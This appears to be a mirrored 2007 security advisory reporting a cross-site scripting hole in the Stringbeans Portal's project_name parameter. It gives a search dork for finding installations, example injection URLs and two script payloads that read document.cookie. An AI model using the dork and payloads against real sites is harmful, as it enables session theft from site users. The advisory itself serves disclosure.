Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:18205
HistoryOct 16, 2007 - 12:00 a.m.

Stringbeans (Portal) - Lang Parameter Cross-Site Scripting Vulnerability

2007-10-1600:00:00
vulners.com
8
JSON

Stringbeans (Portal) - Lang Parameter Cross-Site Scripting Vulnerability

Download:

http://www.nabh.com/projects/sbportal

Bug found by JosS / Jose Luis Góngora Fernández

Contact: sys-project[at]hotmail.com

Spanish Hackers Team

www.spanish-hackers.com

/server irc.freenode.net /join #fullsecure

d0rk: "Powered By Stringbeans"

Stop lammer

Exploit In (XSS):

http://server/path/projects?project_id=3&project_name=[XSS]

http://server/portal/projects?project_id=3&project_name=[XSS]

Cross Siting Scripting (Code):

<script>alert(document.cookie)</script>
"><script>alert(document.cookie)</script>

Admin Login:

http://server/my/portlet_redirect.jsp?orig_url=&#37;2Fportal&#37;2Fmy&#37;2F

//---------------------------------------\\

Greetz To: All Hackers
JosS! / Jose Luis Góngora Fernández

¿Estás pensando en cambiar de coche? Todas los modelos de serie y extras en
MSN Motor. http://motor.msn.es/researchcentre/

JSON